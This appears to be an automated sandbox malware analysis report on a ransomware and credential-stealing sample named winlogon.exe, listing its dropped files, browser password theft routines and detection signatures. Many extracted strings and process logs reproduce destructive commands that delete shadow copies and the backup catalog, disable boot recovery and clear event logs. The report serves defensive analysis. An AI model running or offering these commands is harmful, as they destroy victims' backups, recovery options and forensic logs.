Joe Sandbox Cloud Basic Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:46216
Start time:21:37:49
Joe Sandbox Product:CloudBasic
Start date:12.02.2018
Overall analysis duration:0h 8m 27s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:winlogon.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
HCA Information:
  • Successful, ratio: 97%
  • Number of executed functions: 181
  • Number of non-executed functions: 171
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 54.9% (good quality ratio 51.4%)
  • Quality average: 79%
  • Quality standard deviation: 29.3%
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--"
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exevirustotal: Detection: 59%Perma Link
Antivirus detection for submitted fileShow sources
Source: winlogon.exevirustotal: Detection: 62%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D64140 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_00D64140
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10001D60 GetFileAttributesA,GetTempPathA,GetTempFileNameA,CopyFileA,CryptUnprotectData,HeapAlloc,LocalFree,HeapFree,DeleteFileA,2_2_10001D60
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100010C0 StrStrIW,lstrlenW,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,wsprintfA,wsprintfA,CryptDestroyHash,CryptReleaseContext,2_2_100010C0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10001200 StrStrIW,lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,LocalFree,2_2_10001200

Spam, unwanted Advertisements and Ransom Demands:

barindex
Deletes shadow drive data (may be related to ransomware)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: winlogon.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\cmd.exeWinSta0\Defaulto
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quieth
Source: cmd.exeBinary or memory string: ? c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exeBinary or memory string: ?c:\Windows\system32\vssadmin.exe delete shadows /all /quiettemn
Source: cmd.exeBinary or memory string: 9C:\Windows\system32\cmd.exe/cc:\Windows\system32\vssadmin.exedeleteshadows/all/quietESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\A(0
Source: vssadmin.exeBinary or memory string: Lc:\Windows\system32\vssadmin.exedeleteshadows/all/quiet,
Source: vssadmin.exeBinary or memory string: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: vssadmin.exeBinary or memory string: C:\Users\user\Desktop\c:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quietc:\Windows\system32\vssadmin.exe delete shadows /all /quietWinSta0\Default
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exeBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: _usm.exe.1.drBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
May disable shadow drive data (uses vssadmin)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: 252.0.0.224.in-addr.arpa
Urls found in memory or binary dataShow sources
Source: yegus.exeString found in binary or memory: file:///C:/jbxinitvm.au3
Source: yegus.exeString found in binary or memory: file:///C:/jbxinitvm.au3s
Source: yegus.exeString found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: yegus.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: yegus.exeString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: yegus.exeString found in binary or memory: http://crl.thawte.com/ThawtePCA-G3.crl0
Source: yegus.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: yegus.exeString found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
Source: yegus.exeString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: yegus.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: yegus.exeString found in binary or memory: http://ocsp.digicert.com0K
Source: yegus.exeString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: yegus.exeString found in binary or memory: http://ocsp.thawte.com0
Source: yegus.exeString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: yegus.exeString found in binary or memory: http://s.symcd.com0_
Source: yegus.exeString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0/
Source: yegus.exeString found in binary or memory: http://t2.symcb.com0A
Source: winlogon.exe, _wjg.exe.1.drString found in binary or memory: http://www.sysinternals.com
Source: yegus.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: yegus.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: yegus.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: yegus.exeString found in binary or memory: https://www.thawte.com/cps0)
Source: yegus.exeString found in binary or memory: https://www.thawte.com/cps07
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Tries to resolve many domain names, but no domain seems validShow sources
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)

Stealing of Sensitive Information:

barindex
Contains functionality to dump credential hashes (LSA Dump)Show sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100114D0 LoadLibraryW,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,3_2_100114D0
Contains functionality to steal Chrome passwordsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: \Google\Chrome\User Data\Default\Login Data2_2_10001FB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: \Google\Chrome\User Data\Default\Login Data2_2_10001FB0
Contains functionality to steal Internet Explorer form passwordsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage22_2_10082020
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\logins.json
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
May use bcdedit to modify the Windows boot settingsShow sources
Source: winlogon.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exeBinary or memory string: bcdedit.exe
Source: _usm.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: cmd.exeBinary or memory string: 'Abcdedit.exeV
Source: cmd.exeBinary or memory string: 'Cbcdedit.exe
Source: cmd.exeBinary or memory string: bcdedit.exe
Source: cmd.exeBinary or memory string: indows\system32\bcdedit.exe
Source: cmd.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exeBinary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit.exe*}
Source: cmd.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures B
Source: cmd.exeBinary or memory string: 1C:\Windows\system32\bcdedit.exe\??\C:\Windows\system32\bcdedit.exe
Source: cmd.exeBinary or memory string: >C:\Windows\system32\cmd.exe/cbcdedit.exe/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenablednoamFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\AppData\Local\TempTMP=C:\Users\HERBBL~1\AppData\Local\TempUSERDOMAIN=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BV
Source: cmd.exeBinary or memory string: C:\Windows\system32\bcdedit.exe
Source: cmd.exeBinary or memory string: InternalNamebcdedit.exe
Source: cmd.exeBinary or memory string: OriginalFilenamebcdedit.exej%
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exeBinary or memory string: C:\Users\user\Desktopbcdedit.exeB
Source: cmd.exeBinary or memory string: indows\system32\bcdedit.exe.0\7
Source: cmd.exeBinary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit*B
Source: cmd.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Windows\system32\cmd.exeWinSta0\Defaultf
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noa
Source: cmd.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bC:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled nodWinSta0\Default=C:=C:\Users\user\Desktop=ExitCode=00000000=Z:=Z:\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: @bcdedit.exe/set{default}bootstatuspolicyignoreallfailuresackburnLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: bcdedit.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures WinSta0\Default
Source: bcdedit.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exeBinary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled noWinSta0\Defaulti
Source: bcdedit.exeBinary or memory string: hj4`=\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: _usm.exe.1.drBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Uses bcdedit to modify the Windows boot settingsShow sources
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath,1_2_00D643A0
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B696 push ecx; ret 1_2_00D6B6A9
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013348F6 push ecx; ret 2_2_01334909
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10083436 push ecx; ret 2_2_10083449
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C51CE6 push ecx; ret 3_2_00C51CF9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10001966 push ecx; ret 3_2_10001979
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_00142CC5 push ecx; ret 4_2_00142CD8

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D75F8F FindFirstFileExW,1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01339A82 FindFirstFileExW,2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10088620 FindFirstFileExA,2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5850A FindFirstFileExW,3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10008EEC FindFirstFileExA,3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose,4_2_00141441
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Found PSEXEC tool (often used for remote process execution)Show sources
Source: winlogon.exeString found in binary or memory: PsExec executes a program on a remote system, where remotely executed console
Source: _wjg.exe.1.drString found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

System Summary:

barindex
Submission file is bigger than most known malware samplesShow sources
Source: winlogon.exeStatic file information: File size 1861632 > 1048576
PE file has a big raw sectionShow sources
Source: winlogon.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x195c00
PE file contains a mix of data directories often seen in goodwareShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
